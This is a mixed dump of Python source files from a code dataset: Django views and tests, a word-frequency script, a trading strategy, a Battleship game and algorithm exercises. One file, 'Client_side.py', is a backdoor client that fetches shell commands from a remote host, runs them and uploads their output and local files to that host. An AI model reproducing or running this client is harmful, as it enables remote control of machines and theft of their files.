€\".format(self.current_account))\n\n if self.notify and not self.launched:\n os.system(\"notify-send 'CMU Indicator' 'Rafraichissement fini'\")\n\n self.ind.set_status(appindicator.STATUS_ACTIVE)\n\n return True\n\n def quit(self, widget):\n sys.exit(0)\n\n# Programme =============================================================#\n\nif __name__ == \"__main__\":\n conf_file = os.path.realpath(\"/home/{0}/.cmui.conf\".format(os.getlogin()))\n\n conf = Configuration(conf_file)\n\n indicator = CheckCMU(conf)\n indicator.main()\n\n# vim:set shiftwidth=4 softtabstop=4:\n","sub_path":"cmu-indicator.py","file_name":"cmu-indicator.py","file_ext":"py","file_size_in_byte":6704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"475197785","text":"#:coding=utf-8:\n\nfrom django.test import TestCase as DjangoTestCase\n\nfrom beproud.django.commons.shortcuts import get_object_or_None, make_simple_response\n\nfrom beproud.django.commons.tests.test_shortcuts.shortcuts_app.models import ShortcutModel\n\n\nclass GetObjectOrNoneTestCase(DjangoTestCase):\n\n def test_simple(self):\n obj = get_object_or_None(ShortcutModel, pk=1)\n self.assertTrue(obj is not None)\n\n def test_queryset(self):\n qs = ShortcutModel.objects.filter(name=\"queryset\")\n obj = get_object_or_None(qs, pk=2)\n self.assertTrue(obj is not None)\n\n def test_none(self):\n obj = get_object_or_None(ShortcutModel, pk=5)\n self.assertTrue(obj is None)\n\n\nclass MakeSimpleResponseTestCase(DjangoTestCase):\n\n def test_simple(self):\n response = make_simple_response()\n self.assertEqual(\n response.content,\n u'{\"msg\": \"\\\\u51e6\\\\u7406\\\\u304c\\\\u6210\\\\u529f\\\\u3057\\\\u307e\\\\u3057\\\\u305f\"}',\n )\n","sub_path":"beproud/django/commons/tests/test_shortcuts/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"373159954","text":"from django.conf.urls import url, include\nfrom . import views\nfrom JuEq.views import Equipos\n\n\napp_name='JuEq'\nurlpatterns=[\n\turl(r'^$', views.home, name='home'),\n\turl(r'^nuevo/equipo/$', views.nuevoE, name=\"nuevoE\"),\n\turl(r'^nuevo/jugador/$', views.nuevoJ, name=\"nuevoJ\"),\n\turl(r'^equipos/$', views.Equipos.as_view(), name=\"equipos\"),\n\turl(r'^login/$', views.login_view, name=\"login\"),\n\turl(r'^logout/', views.logout_view, name=\"logout\"),\n\turl(r'^equipo/(?P\\d+)/$', views.EquipoView.as_view(), name=\"EquipoView\"),\n]","sub_path":"JuEq/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"258603014","text":"import requests\nimport os\nimport subprocess\nimport time\n\nwhile True:\n\n req = requests.get('http://192.168.1.1:8080')\n command = req.text\n if 'terminate' in command:\n break\n elif 'grab' in command:\n grab, path = command.spilit(\"*\")\n if os.path.exists(path):\n url = \"http://192.168.1.1:80/store\"\n files = {'file': open(path, 'rb')}\n r = requests.post(url, files = files)\n else:\n post_response = requests.post(url = 'http://192.168.1.1:8080', data = '[-] Not able')\n else:\n cmd = subprocess.Popen(command.decode(),shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE)\n post_responserequests.post(url = 'http://192.168.1.1:8080', data = cmd.stdout.read())\n post_responserequests.post(url = 'http://192.168.1.1:8080', data = cmd.stderr.read())\n time.sleep(3)\n","sub_path":"Python_EXT_COD1/Coding_Upload_file_Data_Exfiltration/Client_side.py","file_name":"Client_side.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"113624203","text":"# coding=utf-8\nimport json\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.http import HttpResponseRedirect, HttpResponse, HttpResponseForbidden\nfrom django.shortcuts import render, resolve_url, get_object_or_404\nfrom django.template.loader import render_to_string\nfrom django.views.decorators.csrf import ensure_csrf_cookie\nimport sys\nfrom Series.models import Series\nfrom Words.forms import WordForm\nfrom Words.models import Words\n\n\n@login_required\ndef setorder(request, sort_field='name_en'):\n\n if 'sort_field' in request.session and 'sort_order' in request.session:\n if request.session['sort_field'] == sort_field:\n request.session['sort_order'] = not request.session['sort_order']\n else:\n request.session['sort_field'] = sort_field\n request.session['sort_order'] = True\n else:\n request.session['sort_field'] = sort_field\n request.session['sort_order'] = True\n\n if 'current_series_slug' in request.session:\n series_slug = request.session['current_series_slug']\n redirect_to = resolve_url('/words/'+ series_slug)\n else:\n redirect_to = resolve_url('allwords')\n\n return HttpResponseRedirect(redirect_to)\n\n@login_required\ndef getWordsListViaSeries(request, series_slug = 'allwords'):\n\n allwordsActive = False\n unAllocatedActive = False\n\n if 'sort_field' in request.session and 'sort_order' in request.session:\n sort_order = \"\"\n if request.session['sort_order'] == False:\n sort_order = \"-\"\n sort_field = sort_order + request.session['sort_field']\n else:\n sort_field = 'name_en'\n request.session['sort_field'] = sort_field\n request.session['sort_order'] = True\n\n\n if series_slug == 'allwords':\n words = Words.objects.filter(user=request.user).order_by(sort_field)\n allwordsActive = True\n elif series_slug == 'unallocatedwords':\n words = Words.objects.filter(series__isnull=True, user=request.user).order_by(sort_field)\n unAllocatedActive = True\n else:\n serie = Series.objects.get(slug=series_slug, user=request.user)\n words = Words.objects.filter(series=serie, user=request.user).order_by(sort_field)\n\n\n series = Series.objects.filter(user=request.user)\n\n allwordsscount = Words.objects.filter(user=request.user).count()\n notallocatedcount = Words.objects.filter(series__isnull=True, user=request.user).count()\n\n series_list = []\n series_list.append([u'Все', 'allwords', allwordsscount, allwordsActive,'Words.allwords'])\n series_list.append([u'Не подшитые', 'unallocatedwords', notallocatedcount, unAllocatedActive, 'Words.unallocatedwords'])\n\n for item in series:\n wordsOfSeries = Words.objects.filter(user=request.user, series=item )\n if item.slug == series_slug:\n series_list.append([item.name, item.slug, wordsOfSeries.count(), True, 'Words.allwordsOfSeries'])\n else:\n series_list.append([item.name, item.slug, wordsOfSeries.count(), False, 'Words.allwordsOfSeries'])\n\n\n paginator = Paginator(words, request.user.profile.words_per_page)\n page = request.GET.get('page')\n try:\n #page = int(page)\n words = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n words = paginator.page(1)\n except EmptyPage:\n words = paginator.page(paginator.num_pages)\n\n context = {\n 'wordslist': words,\n 'groups': series_list,\n 'sort_field': request.session['sort_field'],\n 'sort_order': request.session['sort_order'],\n }\n\n 
request.session['current_series_slug'] = series_slug\n\n return context\n\n@login_required\ndef allwordsOfSeries(request,series_slug='allwords', template_name='words.html', extra_context=None):\n context = getWordsListViaSeries(request,series_slug)\n\n if extra_context is not None:\n context.update(extra_context)\n\n return render(request, template_name, context)\n\n@login_required\n@ensure_csrf_cookie\ndef delete_words(request):\n\n if request.is_ajax():\n\n try:\n idarray = request.POST['words_id_array']\n\n iddict = json.loads(idarray)\n for element in iddict:\n word = Words.objects.filter(user=request.user, id=element.get('value'))\n word.delete()\n\n response = json.dumps({'success':'True'})\n except:\n error_text = u'Неожиданная ошибка: ' + sys.exc_info()[1].message\n html = render_to_string(\"error.html\", {'error_text': error_text})\n response = json.dumps({'success':'False','html': html})\n\n return HttpResponse(response, content_type='application/javascript; charset=utf-8')\n else:\n return HttpResponseForbidden()\n\n@login_required\ndef newword(request, template_name='newword.html', extra_context=None):\n\n if request.method == 'POST':\n postdata = request.POST.copy()\n form = WordForm(postdata)\n if form.is_valid():\n new_word = form.save(request.user)\n if new_word.series != None:\n redirect_to = resolve_url('/words/'+ new_word.series.slug)\n else:\n redirect_to = resolve_url('words')\n return HttpResponseRedirect(redirect_to)\n else:\n word = Words()\n if 'current_series_slug' in request.session:\n series_slug = request.session['current_series_slug']\n try:\n current_serie = Series.objects.get(slug=series_slug)\n word.series = current_serie\n except ObjectDoesNotExist:\n pass\n\n form = WordForm(instance=word)\n\n context = {\n 'form': form,\n }\n\n if extra_context is not None:\n context.update(extra_context)\n\n return render(request, template_name, context)\n\n@login_required\ndef editword(request, word_slug, template_name='newword.html', extra_context=None):\n\n word1 = get_object_or_404(Words,slug = word_slug, user=request.user)\n if request.method == 'POST':\n postdata = request.POST.copy()\n form = WordForm(postdata,instance=word1)\n if form.is_valid():\n\n updated_word = form.save(request.user)\n if updated_word.series != None:\n redirect_to = resolve_url('/words/'+ updated_word.series.slug)\n else:\n redirect_to = resolve_url('words')\n return HttpResponseRedirect(redirect_to)\n else:\n form = WordForm(instance=word1)\n\n context = {\n 'form': form,\n }\n\n if extra_context is not None:\n context.update(extra_context)\n\n return render(request, template_name, context)\n","sub_path":"Words/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"519365303","text":"# File: Books.py\n\n# Description: Computes word frequency statistics for two novels, and compares their differences.\n\n# Date Created: 04/24/2016\n\n# Date Last Modified:04/27/2016\n######################################################################################################\n\n# Create word dictionary from the comprehensive word list\nword_dict = {}\ndef create_word_dict (file):\n str = file.read().strip()\n keys = str.split()\n for key in keys:\n word_dict[key] = 0\n file.close()\n return word_dict\n# Removes punctuation marks from a string\ndef parseString(line):\n words = line.split()\n punctuations = '''!()-[]{};:\"\\,<>./?@#$%^&*_~'''\n for str in words:\n for char in str:\n if(char in punctuations):\n char_old = char\n char_new = \" \"\n line = line.replace(char_old, char_new)\n elif(char == \"'\"):\n # remove punctuation from the string\n if(str.endswith(\"'s\") or str.endswith(\"'\")):\n if(str.endswith(\"'s\")):\n str_old = str\n\n str = str.replace(\"'s\", \"\")\n line = line.replace(str_old, str)\n elif(str.endswith(\"'\")):\n str_old = str\n str_new = str.replace(\"'\", \"\")\n line = line.replace(str_old, str_new)\n elif(char.isdigit() == True):\n char_old = char\n char_new = \"\"\n line = line.replace(char_old, char_new)\n return line\n# This function creates a list containing the keys that begin with a capital letter\ndef get_caps(dict):\n caps_list = []\n for key in dict:\n if(key[0].isupper() == True):\n caps_list.append(key)\n return caps_list\n\n# This dictionary computes the word counts for the specific text\ndef getWordFreq (file):\n word_counts = {}\n for line in file:\n line = parseString(line)\n words = line.split()\n for word in words:\n if (word in word_counts):\n word_counts[word] += 1\n else:\n word_counts[word] = 1\n # Call get_caps function\n caps_list = get_caps(word_counts)\n for item in caps_list:\n if(item.lower() in word_counts):\n word_counts[item.lower()] += (word_counts[item])\n elif(item.lower() in word_dict):\n word_counts[item.lower()] = 1\n del word_counts[item]\n return word_counts\n# This computes the total word count including duplicates\ndef total_words(word_counts):\n total = 0\n for word in word_counts:\n total += word_counts.get(word)\n return total\n# This functions computes statistics for the two novels\ndef wordComparison(author1, freq1, author2, freq2):\n\n distinct_count1 = len(freq1)\n distinct_count2 = len(freq2)\n total1 = total_words(freq1)\n total2 = total_words(freq2)\n\n D = set(freq1)\n H = set(freq2)\n D_not_H = (D - H)\n H_not_D = (H - D)\n sum1 = 0\n for word in D_not_H:\n sum1 += freq1.get(word)\n sum2 = 0\n for word in H_not_D:\n sum2 += freq2.get(word)\n # Here is the data for the first author\n print(author1)\n print(\"Total distinct words = \",distinct_count1)\n print(\"Total words (including duplicates) = \",total1)\n print(\"Ratio (% of total distinct words to total words) = \", round(100*(distinct_count1/total1), 10), \"\\n\")\n # Here is the data for the second author\n print(author2)\n print(\"Total distinct words = \",distinct_count2)\n print(\"Total words (including duplicates) = \",total2)\n print(\"Ratio (% of total distinct words to total words) = \", round(100*(distinct_count2/total2), 10),\"\\n\")\n print(author1, \"used\", len(D_not_H), \"words that\", author2, \"did not use.\")\n # Here is the data for the set differences\n print(\"Relative frequency of words used by\", author1, \"not in common with\", author2, \"= %.10f\" % ((sum1/ total1)*100),\"\\n\")\n 
print(author2, \"used\", len(H_not_D), \"words that\", author1, \"did not use.\")\n print(\"Relative frequency of words used by\", author2, \"not in common with\", author1, \"= %.10f\" % ((sum2/ total2)*100),\"\\n\")\n# Calling main function\ndef main():\n #Create word dictionary from comprehensive word list\n dict_file = open(\"words.txt\", \"r\")\n word_dict = create_word_dict(dict_file)\n\n #Enter names of the two books in electronic form\n book1 = input(\"Enter name of first book: \").strip()\n book2 = input(\"Enter name of second book: \").strip()\n print()\n\n # Enter names of the two authors\n author1 = input(\"Enter last name of first author: \")\n author2 = input(\"Enter last name of second author: \")\n print()\n\n # Get the frequency of words used by the two authors\n file_name1 = (book1 + \".txt\").strip()\n file_name2 = (book2 + \".txt\").strip()\n file1 = open(file_name1, \"r\")\n file2 = open(file_name2, \"r\")\n wordFreq1 = getWordFreq(file1)\n wordFreq2 = getWordFreq(file2)\n\n # Compare the relative frequency of uncommon words used by the two authors\n wordComparison (author1, wordFreq1, author2, wordFreq2)\n\nmain()\n","sub_path":"Books.py","file_name":"Books.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"284804108","text":"from algotrader.event.order import OrdAction\nfrom algotrader.strategy.strategy import Strategy\n\n\nclass MertonOptimalBaby(Strategy):\n \"\"\"\n This is the baby version that assume appreciation rate and the volatility of the underlying is known\n in advance before constructing the strategy\n in reality this is not true\n So for more advanced version the strategy itself should able to call statistical inference logic to\n get the appreciation rate and volatility of the asset\n\n So now this class is used as testing purpose\n \"\"\"\n\n def __init__(self, stg_id=None, stg_configs=None):\n super(MertonOptimalBaby, self).__init__(stg_id=stg_id, stg_configs=stg_configs)\n self.buy_order = None\n\n def _start(self, app_context, **kwargs):\n self.arate = self.get_stg_config_value(\"arate\", 1)\n self.vol = self.get_stg_config_value(\"vol\", 1)\n\n self.bar = app_context.inst_data_mgr.get_series(\"Bar.%s.Time.86400\" % self.app_context.app_config.instrument_ids[0])\n self.bar.start(app_context)\n\n self.optimal_weight = self.arate / self.vol ** 2 # assume risk free rate is zero\n\n super(MertonOptimalBaby, self)._start(app_context, **kwargs)\n\n def _stop(self):\n super(MertonOptimalBaby, self)._stop()\n\n def on_bar(self, bar):\n # we have to rebalance on each bar\n # print bar\n portfolio = self.get_portfolio()\n allocation = portfolio.total_equity * self.optimal_weight\n delta = allocation - portfolio.stock_value\n if delta > 0:\n qty = delta / bar.close # assume no lot size here\n self.market_order(inst_id=bar.inst_id, action=OrdAction.BUY, qty=qty)\n else:\n qty = -delta / bar.close # assume no lot size here\n self.market_order(inst_id=bar.inst_id, action=OrdAction.SELL, qty=qty)\n","sub_path":"algotrader/strategy/merton_optimal.py","file_name":"merton_optimal.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"406935590","text":"\"\"\"\r\nBattleship Project\r\nName:\r\nRoll No:\r\n\"\"\"\r\n\r\nimport battleship_tests as test\r\n\r\nproject = \"Battleship\" # don't edit this\r\n\r\n### SIMULATION FUNCTIONS ###\r\n\r\nfrom tkinter import *\r\nimport random\r\n\r\nEMPTY_UNCLICKED = 1\r\nSHIP_UNCLICKED = 2\r\nEMPTY_CLICKED = 3\r\nSHIP_CLICKED = 4\r\n\r\n\r\n'''\r\nmakeModel(data)\r\nParameters: dict mapping strs to values\r\nReturns: None\r\n'''\r\ndef makeModel(data):\r\n data[\"number of rows\"]=10\r\n data[\"number of cols\"]=10\r\n data[\"board size\"]=500\r\n data[\"number of ships\"]=5\r\n data[\"cellsize\"]=data[\"board size\"]/data[\"number of rows\"]\r\n data[\"computer\"]=emptyGrid(data[\"number of rows\"],data[\"number of cols\"])\r\n data[\"user\"]=emptyGrid(data[\"number of rows\"],data[\"number of cols\"])\r\n data[\"temporary ship\"]=[]\r\n data[\"numships\"]=0\r\n data[\"winner\"]=None\r\n data[\"max num of turns\"]=50\r\n data[\"current num of turns\"]=0\r\n addShips(data[\"computer\"],data[\"number of ships\"])\r\n'''\r\nmakeView(data, userCanvas, compCanvas)\r\nParameters: dict mapping strs to values ; Tkinter canvas ; Tkinter canvas\r\nReturns: None\r\n'''\r\ndef makeView(data, userCanvas, compCanvas):\r\n drawGrid(data,userCanvas,data[\"user\"],True)\r\n drawGrid(data,compCanvas,data[\"computer\"],False)\r\n drawShip(data,userCanvas,data[\"temporary ship\"])\r\n drawGameOver(data,userCanvas)\r\n\r\n\r\n'''\r\nkeyPressed(data, events)\r\nParameters: dict mapping strs to values ; key event object\r\nReturns: None\r\n'''\r\ndef keyPressed(data, event):\r\n print(event,type(event))\r\n if event.char=='\\r':\r\n makeModel(data)\r\n\r\n\r\n'''\r\nmousePressed(data, event, board)\r\nParameters: dict mapping strs to values ; mouse event object ; 2D list of ints\r\nReturns: None\r\n'''\r\ndef mousePressed(data, event, board):\r\n if data[\"winner\"]==None:\r\n if board==\"comp\":\r\n if data[\"numships\"]==5:\r\n cell=getClickedCell(data,event)\r\n runGameTurn(data,cell[0],cell[1])\r\n if data[\"numships\"]<5:\r\n if board==\"user\":\r\n cell=getClickedCell(data,event)\r\n clickUserBoard(data,cell[0],cell[1])\r\n \r\n#### WEEK 1 ####\r\n\r\n'''\r\nemptyGrid(rows, cols)\r\nParameters: int ; int\r\nReturns: 2D list of ints\r\n'''\r\ndef emptyGrid(rows, cols):\r\n grid=[]\r\n for row in range (rows):\r\n grid.append([])\r\n d=grid[row]\r\n for col in range(cols):\r\n d.append(EMPTY_UNCLICKED)\r\n return grid\r\n\r\n\r\n'''\r\ncreateShip()\r\nParameters: no parameters\r\nReturns: 2D list of ints\r\n'''\r\ndef createShip():\r\n row=random.randint(1,8)\r\n col=random.randint(1,8)\r\n align=random.randint(0,1)\r\n if align==0:\r\n ship=[[row-1,col],[row,col],[row+1,col]]\r\n else:\r\n ship=[[row,col-1],[row,col],[row,col+1]]\r\n return ship\r\n\r\n\r\n'''\r\ncheckShip(grid, ship)\r\nParameters: 2D list of ints ; 2D list of ints\r\nReturns: bool\r\n'''\r\ndef checkShip(grid, ship):\r\n for i in range(len(ship)):\r\n x=ship[i][0]\r\n y=ship[i][1]\r\n if grid[x][y]!=EMPTY_UNCLICKED:\r\n return False\r\n return True\r\n\r\n\r\n'''\r\naddShips(grid, numShips)\r\nParameters: 2D list of ints ; int\r\nReturns: 2D list of ints\r\n'''\r\ndef addShips(grid, numShips):\r\n j=0\r\n while j\", lambda event : keyEventHandler(data, userCanvas, compCanvas, event))\r\n compWindow.bind(\"\", lambda event : keyEventHandler(data, userCanvas, compCanvas, event))\r\n userCanvas.bind(\"\", lambda event : mouseEventHandler(data, userCanvas, compCanvas, event, \"user\"))\r\n compCanvas.bind(\"\", lambda 
event : mouseEventHandler(data, userCanvas, compCanvas, event, \"comp\"))\r\n\r\n updateView(data, userCanvas, compCanvas)\r\n\r\n root.mainloop()\r\n\r\n\r\n### RUN CODE ###\r\n\r\n# This code runs the test cases to check your work\r\nif __name__ == \"__main__\":\r\n # test.testEmptyGrid()\r\n # test.testCreateShip()\r\n # test.testCheckShip()\r\n # test.testAddShips()\r\n # test.testMakeModel()\r\n # test.testIsVertical()\r\n # test.testIsHorizontal()\r\n # test.testGetClickedCell()\r\n # test.testShipIsValid()\r\n # test.testUpdateBoard()\r\n # test.testGetComputerGuess()\r\n # test.testIsGameOver()\r\n ## Finally, run the simulation to test it manually ##\r\n runSimulation(500, 500)\r\n","sub_path":"battleship.py","file_name":"battleship.py","file_ext":"py","file_size_in_byte":11908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"264265193","text":"from argparse import ArgumentParser\nimport utils\n\ndef parseArgs():\n parser = ArgumentParser(description='Process arguments.')\n parser.add_argument('sum', metavar='S', type=int, help='sum to match')\n parser.add_argument('number', metavar='N', type=int, help='number of elements that sum up to the given sum')\n return parser.parse_args()\n\ndef main():\n args = parseArgs()\n content = utils.readFile('../../inputs/day1.txt')\n\n els = utils.findElements(content, args.sum, args.number)\n if len(els) == 0:\n print(\"No sequences found.\")\n else:\n print(\"\\n\".join([ \"Found [\" + \", \".join([str(ie) for ie in e]) + \"] with product of \" + str(p) + \".\" for e, p in els ]))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/day1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"383507143","text":"\"\"\"Home page handlers\"\"\"\n\nimport json\nimport logging\nimport tornado\nfrom tornado import gen\nfrom ..base.handlers import BaseHandler\n\nLOGGER = logging.getLogger(__name__)\n\nclass DataSourceSettingsHandler(BaseHandler):\n \"\"\" Datasource settings page handler \"\"\"\n\n @gen.coroutine\n @tornado.web.authenticated\n def get(self):\n \"\"\"GET method for datasource settings\"\"\"\n self.render(\"home/home.html\")\n\n @gen.coroutine\n @tornado.web.authenticated\n def post(self):\n \"\"\"POST method for datasource settings\"\"\"\n datasource_settings = json.dumps(\\\n {element: self.get_argument(element) for element in self.request.arguments})\n print('\\n\\n\\n')\n from pprint import pprint\n pprint(datasource_settings)\n print('\\n\\n\\n')\n self.db_cur.execute(\\\n \"INSERT INTO datasource_settings (user_id, type, datasource_access_settings)\\\n VALUES (%s, %s, %s);\", (str(self.current_user[\"id\"]), 1, datasource_settings))\n self.db_conn.commit()\n self.redirect(\"/user_settings\")\n","sub_path":"src/app/models/datasource_settings/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"256357427","text":"## 1.柠檬水找零\nclass Solution:\n def lemonadeChange(self, bills: List[int]) -> bool:\n count_5, count_10 = 0, 0\n for i in bills:\n if i == 5:\n count_5 += 1\n elif i == 10:\n if count_5 > 0:\n count_5 -= 1\n else:\n return False\n count_10 += 1\n else:\n if count_10 > 0 and count_5 > 0:\n count_10 -= 1\n count_5 -= 1\n elif count_5 > 3:\n count_5 -= 3\n else:\n return False\n return True\n\n## 2.买卖股票的最佳时机 II\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n profit = 0\n length = len(prices)\n if length < 2:\n return profit\n for i in range(length-1):\n if prices[i] < prices[i+1]:\n profit += prices[i+1] - prices[i]\n return profit\n\n## 3.分发饼干\nclass Solution:\n def findContentChildren(self, g: List[int], s: List[int]) -> int:\n sort_g, sort_s = sorted(g), sorted(s)\n count = 0\n len_g, len_s = len(g), len(s)\n for i in range(len_s):\n if count == len_g:\n break\n if sort_s[i] >= sort_g[count]:\n count += 1\n return count\n\n## 4.模拟行走机器人\nclass Solution:\n def robotSim(self, commands: List[int], obstacles: List[List[int]]) -> int:\n obstacles = set(map(tuple, obstacles))\n direction = 1 # 0-west, 1-north, 2-east, 3-south\n dx = [-1, 0, 1, 0]\n dy = [0, 1, 0, -1]\n x, y = 0, 0\n dist = 0\n for i in commands:\n if i == -2:\n direction = (direction - 1) % 4\n elif i == -1:\n direction = (direction + 1) % 4\n else:\n for _ in range(i):\n if (x + dx[direction], y + dy[direction]) not in obstacles:\n x += dx[direction]\n y += dy[direction]\n dist = max(dist, x**2 + y**2)\n return dist\n\n## 5.单词接龙\nclass Solution:\n def ladderLength(self, beginWord, endWord, wordList):\n \"\"\"\n 1.BFS\n \"\"\"\n node = collections.defaultdict(list)\n for i in wordList:\n for j in range(len(i)):\n node[i[0:j] + \"*\" + i[j + 1:]].append(i)\n\n quene = collections.deque([beginWord])\n visit = {beginWord}\n count = 1\n while quene:\n count += 1\n for _ in range(len(quene)):\n beginWord = quene.popleft()\n for j in range(len(beginWord)):\n linked_node = node[beginWord[0:j] + \"*\" + beginWord[j + 1:]]\n for k in linked_node:\n if k not in visit:\n if k == endWord:\n return count\n visit.add(k)\n quene.append(k)\n return 0\n\n## 6.岛屿数量\nclass Solution:\n def numIslands(self, grid: List[List[str]]) -> int:\n \"\"\"\n 1.dfs\n 2.bfs\n \"\"\"\n count = 0\n if len(grid) == 0 or len(grid[0]) == 0:\n return count\n\n len_x, len_y = len(grid), len(grid[0])\n def dfs(x, y):\n if x < 0 or x >= len_x or y < 0 or y >= len_y:\n return\n if grid[x][y] == '1':\n grid[x][y] = '0'\n dfs(x - 1, y)\n dfs(x + 1, y)\n dfs(x , y - 1)\n dfs(x , y + 1)\n return\n\n for i in range(len_x):\n for j in range(len_y):\n if grid[i][j] == '1':\n count += 1\n dfs(i, j)\n return count\n\n## 7.扫雷游戏\nclass Solution:\n def updateBoard(self, board: List[List[str]], click: List[int]) -> List[List[str]]:\n \"\"\"\n 1.dfs\n 2.bfs\n \"\"\"\n x, y = click\n len_x, len_y = len(board), len(board[0])\n\n def dfs(x, y):\n if x < 0 or x >= len_x or y < 0 or y >= len_y:\n return\n if board[x][y] == 'M': # 1.挖到雷上\n board[x][y] = 'X'\n return\n elif board[x][y] == 'E':\n num_mine = check(x, y)\n if num_mine:\n board[x][y] = str(num_mine)\n else:\n board[x][y] = 'B'\n for i in [-1, 0, 1]:\n for j in [-1, 0, 1]:\n if i == 0 and j == 0:\n continue\n dfs(x + i, y + j)\n return\n return\n\n def check(x, y):\n num_mine = 0\n for i in [-1, 0, 1]:\n for j in [-1, 0, 1]:\n x_1, y_1 = x + i, y + j\n if x_1 < 0 or x_1 >= len_x or y_1 < 0 or y_1 >= len_y:\n continue\n if board[x_1][y_1] == 'M':\n num_mine += 1\n return num_mine\n\n 
dfs(x, y)\n return board\n\n## 8.跳跃游戏\nclass Solution:\n def canJump(self, nums: List[int]) -> bool:\n length = len(nums)\n cur_pos, max_pos = 0, 0\n while cur_pos <= max_pos:\n max_pos = max(max_pos, cur_pos+nums[cur_pos])\n if max_pos >= length-1:\n return True\n cur_pos += 1\n return False\n\n## 9.搜索旋转排序数组\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n if len(nums) == 0:\n return -1\n left, right = 0, len(nums) - 1\n while left <= right:\n mid = (left + right) // 2\n if nums[mid] == target:\n return mid\n elif (nums[left] < nums[mid] and nums[left] <= target < nums[mid]) or (nums[mid] < nums[right] and (target < nums[mid] or target > nums[right])):\n right = mid - 1\n else:\n left = mid + 1\n return -1\n\n## 10.搜索二维矩阵\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n m = len(matrix)\n if m == 0:\n return False\n n = len(matrix[0])\n if n == 0:\n return False\n left, right = 0, m * n - 1\n while left <= right:\n mid = (left + right) // 2\n x, y = mid // n, mid % n\n if matrix[x][y] == target:\n return True\n elif target < matrix[x][y]:\n right = mid - 1\n else:\n left = mid + 1\n return False\n\n## 11.单词接龙 II\nclass Solution:\n def findLadders(self, beginWord: str, endWord: str, wordList: List[str]) -> List[List[str]]:\n wordList_set = set(wordList)\n res = []\n if endWord not in wordList_set or len(wordList_set) == 0:\n return res\n\n use_node = collections.defaultdict(set)\n if self.bfs(beginWord, endWord, wordList_set, use_node):\n ans = [beginWord]\n self.dfs(beginWord, endWord, use_node, ans, res)\n return res\n\n def bfs(self, beginWord, endWord, wordList_set, use_node):\n reach = False\n quene = collections.deque([beginWord])\n early_visit = {beginWord}\n len_word = len(beginWord)\n while quene:\n if reach:\n break\n now_visit = set()\n length = len(quene)\n for i in range(length):\n ans = quene.popleft()\n ans_list = list(ans)\n for j in range(len_word):\n origin_char = ans_list[j]\n for k in string.ascii_lowercase:\n ans_list[j] = k\n new_word = \"\".join(ans_list)\n if new_word in wordList_set:\n if new_word == endWord:\n reach = True\n if new_word not in early_visit:\n use_node[ans].add(new_word)\n quene.append(new_word)\n if new_word not in now_visit:\n now_visit.add(new_word)\n ans_list[j] = origin_char\n early_visit = early_visit | now_visit\n return reach\n\n def dfs(self, beginWord, endWord, use_node, ans, res):\n if ans[-1] == endWord:\n res.append(ans[:])\n return\n if beginWord not in use_node:\n return\n for i in use_node[ans[-1]]:\n ans.append(i)\n self.dfs(i, endWord, use_node, ans, res)\n ans.pop()\n\n## 12.跳跃游戏 II\nclass Solution:\n def jump(self, nums: List[int]) -> int:\n length = len(nums)\n if length < 2:\n return 0\n cur_pos, max_pos = 0, 0\n count = 1\n while cur_pos <= max_pos:\n max_pos = max(max_pos, cur_pos + nums[cur_pos])\n if max_pos >= length - 1:\n return count\n max_step, max_idx = -1, -1\n right = max_pos + 1 if max_pos + 1 <= length else length\n for i in range(cur_pos + 1, right):\n if nums[i] + i >= max_step:\n max_step = nums[i] + i\n max_idx = i\n count += 1\n cur_pos = max_idx","sub_path":"Week04/week04.py","file_name":"week04.py","file_ext":"py","file_size_in_byte":9542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
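Both Word Ladder solutions in the record above lean on the same wildcard-bucket trick: two words differ in exactly one letter iff they share a pattern such as "h*t", so neighbours can be looked up by pattern instead of comparing every pair of words. A small self-contained illustration; the word list is a made-up sample, not data from the record:

import collections

wordList = ["hot", "dot", "dog", "lot", "log", "cog"]
buckets = collections.defaultdict(list)
for w in wordList:
    for j in range(len(w)):
        buckets[w[:j] + "*" + w[j+1:]].append(w)   # each word lands in len(w) buckets

print(buckets["*ot"])  # ['hot', 'dot', 'lot'] -- pairwise one-letter neighbours
print(buckets["do*"])  # ['dot', 'dog']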
